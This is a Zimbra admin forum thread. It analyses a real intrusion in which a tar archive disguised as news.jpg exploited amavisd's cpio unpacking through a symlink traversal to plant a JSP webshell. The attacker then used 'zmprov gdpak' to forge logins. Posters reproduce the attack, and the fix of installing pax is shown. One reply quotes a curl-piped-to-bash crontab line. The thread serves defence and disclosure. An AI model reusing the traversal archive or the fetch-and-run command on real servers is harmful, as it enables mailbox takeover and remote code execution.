Attacker managed to upload files into Web Client directory

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
yeak
ZCS/ZD Version: Zimbra 10

Attacker managed to upload files into Web Client directory

Post by yeak »

We have an incident where the attacker managed to upload jsp files into Web Client /public directory by simply sending in an email with malicious attachment.

Our system already patched to P26 on Zimbra 9.

The incident timeline and steps:
1. Send a malicious file to one of the user. The amavisd will process this file and I think via cpio loophole, got the file extracted into the target folder /opt/zimbra/jetty/webapps/zimbra/public.

Sep 7 11:19:46 mb1 amavis[109612]: (109612-08) ESMTP [127.0.0.1]:10024 /opt/zimbra/data/amavisd/tmp/amavis-20220907T111538-109612-whQHcMYk: <adrobots@proton.me> -> <xxx@yyy.zzz> SIZE=130680 Received: from mb1.yyy.zzz ([127.0.0.1]) by localhost (mb1.yyy.zzz [127.0.0.1]) (amavisd-new, port 10024) with ESMTP for <xxx@yyy.zzz>; Wed, 7 Sep 2022 11:19:46 +0800 (+08)
Sep 7 11:19:49 mb1 amavis[109612]: (109612-08) Checking: VHxEN5Rp86Lq [192.168.aa.bb] <adrobots@proton.me> -> <xxx@yyy.zzz>
Sep 7 11:19:49 mb1 amavis[109612]: (109612-08) (!)WARN: Using cpio instead of pax can be a security risk; please add: $pax='pax'; to amavisd.conf and check that the pax(1) utility is available on the system!
Sep 7 11:19:49 mb1 amavis[109612]: (109612-08) (!)WARN: Using cpio instead of pax can be a security risk; please add: $pax='pax'; to amavisd.conf and check that the pax(1) utility is available on the system!

2. The attacker access this file (webshell) via the public and executed "zmprov gdpak" to generate preauth and login into any user they targeted.

3. They login to xxx@yyy.zzz account to delete the file they sent in via step1 to try erase the trail.

We have reported this to Zimbra Support together with the malicious email with the attachment.

All above is possible to happen if the Zimbra installation is standalone. A weakness in one of the component (MTA) lead to compromise in other component (Mailstore).

If you want a copy of this malicious attachment (news.jpg), you can private message me.

$ file news.jpg
news.jpg: POSIX tar archive (GNU)

$ tar tf news.jpg
data
data/searchx.jsp

$ tar xf news.jpg
tar: data/searchx.jsp: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors

$ ls -l
lrwxrwxrwx 1 yeak yeak 46 Aug 29 20:33 data -> ../../../../../../jetty/webapps/zimbra/public/

$ strings news.jpg
data
2../../../../../../jetty/webapps/zimbra/public/
ustar
root
root
data/searchx.jsp
ustar
root
root
<%@page pageEncoding="utf-8"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.util.regex.*"%>
<%@page import="java.sql.*"%>

My question: How to follow amavisd alert to configure amavisd.conf correctly? I simply "yum install pax". Will this avoid it?

Thanks.
BradC
Outstanding Member
Outstanding Member

Re: Attacker managed to upload files into Web Client directory

Post by BradC »

yeak wrote:If you want a copy of this malicious attachment (news.jpg), you can private message me.
I have done.

Nice analysis btw.
Klug
Ambassador
Ambassador
ZCS/ZD Version: All of them

Post by Klug »

@Yeak, which OS are you running?

pax is in the "prerequisites" of Zimbra with Ubuntu (see here: https://wiki.zimbra.com/wiki/Ubuntu_Upgrades)
I'm quite sure it is for RHEL/CentOS too.

Also, in an up-to-date (8.8.15P33) amavisd.conf, there's this:

Code: Select all

[['cpio','tar'], \&do_pax_cpio, ['pax', 'gcpio', 'cpio'] ],
I've checked on several servers, none as the "cpio instead of pax" warning in the logs.

As you suggest, installing pax "fixes" the issue.
The question for me is to find out why Zimbra's setup procedure didn't mark this as prerequisite for your server and/or how you managed to install the server without the prerequisite.

Edit a bit later: pax is in the "suggested prerequisite", doesn't seem to be mandatory.
ghen
Outstanding Member
Outstanding Member
ZCS/ZD Version: 9.0.0

Post by ghen »

On CentOS/RHEL, pax used to be installed by default, that's probably why Zimbra doesn't list it as a dependency on RHEL: https://bugzilla.zimbra.com/show_bug.cgi?id=80716.
But it's not standard anymore since EL6, so it probably should be made an explicit dependency of zimbra-amavisd. Once pax is installed, amavisd automatically prefers it over cpio.
yeak
ZCS/ZD Version: Zimbra 10

Post by yeak »

Klug wrote:@Yeak, which OS are you running?

pax is in the "prerequisites" of Zimbra with Ubuntu (see here: https://wiki.zimbra.com/wiki/Ubuntu_Upgrades)
I'm quite sure it is for RHEL/CentOS too.
Yes, CentOS 7.9.

Many of our setup use Minimal OS package then begin Zimbra installation. I will get my team to add pax immediately for all deployments.
BradC
Outstanding Member
Outstanding Member

Post by BradC »

It looks very much like a stripped down version (db stuff removed) of this web shell : https://github.com/xl7dev/WebShell/blob ... 0Ninty.jsp

Unpacking with cpio, tar and pax using default options all create the symlink and attempt to write the webshell. I'm now looking at the various options to see if there is an obvious one that will prevent that from occurring.

brad@bkd:~/temp/zimbra$ tar -xvf ../news.jpg ; ls -la data
data
data/searchx.jsp
tar: data/searchx.jsp: Cannot open: Not a directory
tar: Exiting with failure status due to previous errors
lrwxrwxrwx 1 brad brad 46 Aug 29 20:33 data -> ../../../../../../jetty/webapps/zimbra/public/
brad@bkd:~/temp/zimbra$ rm data 
brad@bkd:~/temp/zimbra$ cpio -idv -F ../news.jpg ; ls -la data
data
cpio: cannot make directory `data': No such file or directory
cpio: data/searchx.jsp: Cannot open: No such file or directory
data/searchx.jsp
159 blocks
lrwxrwxrwx 1 brad brad 46 Sep 12 10:33 data -> ../../../../../../jetty/webapps/zimbra/public/
brad@bkd:~/temp/zimbra$ rm data 
brad@bkd:~/temp/zimbra$ pax -r < ../news.jpg ; ls -la data
pax: Unable to create data/searchx.jsp: Not a directory
lrwxrwxrwx 1 brad brad 46 Aug 29 20:33 data -> ../../../../../../jetty/webapps/zimbra/public/
I fed it into our Zimbra test server and while no malware was identified it didn't trigger an error or drop the payload.
I then went to /usr/bin and

cd /usr/bin ; mv pax pax.old 
su - zimbra
zmamavisdctl restart
Re-sent the e-mail and :

ls /opt/zimbra/jetty/webapps/zimbra/public/searchx.jsp
searchx.jsp
So make sure pax is installed to mitigate this one.
No Pax :

Sep 12 11:26:14 mail amavis[2806676]: Found decoder for    .cpio at /usr/bin/cpio
Sep 12 11:26:14 mail amavis[2806676]: Found decoder for    .tar  at /usr/bin/cpio
Pax :

Sep 12 11:32:10 mail amavis[2811141]: Found decoder for    .cpio at /usr/bin/pax
Sep 12 11:32:10 mail amavis[2811141]: Found decoder for    .tar  at /usr/bin/pax
barrydegraaff
Zimbra Employee
Zimbra Employee

Post by barrydegraaff »

For everyone else reading running:

yum intall pax
# or
apt-get install pax
and restarting Zimbra should take care of the issue:

sudo su zimbra -
zmcontrol restart
We will work on adding this to the next patch, thanks.
--
Barry de Graaff
Email: barry.degraaff [at] synacor [dot] com
Admin of Zimbra-Community Github: https://github.com/orgs/Zimbra-Community/ and the
Zimlet Gallery https://gallery.zetalliance.org/extend/
BradC
Outstanding Member
Outstanding Member

Post by BradC »

barrydegraaff wrote:For everyone else reading running:

yum intall pax
# or
apt-get install pax
and restarting Zimbra should take care of the issue:
Given this vulnerability has already bitten at least one person and is clearly in the wild, perhaps an announcement or security advisory might be prudent.
Not everyone reads the forum.
gabrieles
Outstanding Member
Outstanding Member

Post by gabrieles »

BradC wrote: Given this vulnerability has already bitten at least one person and is clearly in the wild
Last week we saw something similar to the first post (on zimbra crontab there was a curl --insecure https://xxx.yyy.www.zzz/something.jpg and a pipaed bash) but probably we mistaken it for a mboximport violation an cleaned it as usual. We're gonna check if pax...
Matt

Post by Matt »

BradC wrote: Given this vulnerability has already bitten at least one person and is clearly in the wild, perhaps an announcement or security advisory might be prudent.
Not everyone reads the forum.
I agree, an announcement should be made.

Since the attackers have write access via this vulnerability (presumably as the zimbra user), it's likely it won't be long before they modify the attack to work in some form on dedicated mta servers too.